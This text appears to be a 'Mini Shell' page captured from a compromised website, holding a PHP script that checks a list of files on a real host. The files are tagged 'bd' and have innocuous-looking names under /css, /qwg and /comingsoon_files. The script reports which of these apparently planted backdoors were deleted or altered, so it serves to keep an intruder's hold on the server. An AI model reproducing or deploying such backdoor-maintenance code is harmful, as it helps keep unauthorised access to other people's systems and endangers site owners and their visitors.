Mini Shell
<?php $r = '/home/ukubnwwt/turvalty.com'; $x = ["/qwg/pj.login.php"=>"bd@@223607@@1547",
"/comingsoon_files/landing_page.php"=>"bd@@211095@@1770",
"/qwg/pj_login.php"=>"bd@@211631@@reverse_lookup",
"/comingsoon_files/landing_page.php"=>"bd@@212199@@module_controller",
"/css/searchtypes.php"=>"bd@@224114@@data_storage",
"/qwg/pj.login.php"=>"bd@@224119@@41",
"/header.bak.php"=>"bd@@224125@@2511",
"/css/sqlparser.data.php"=>"bd@@223592@@50"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');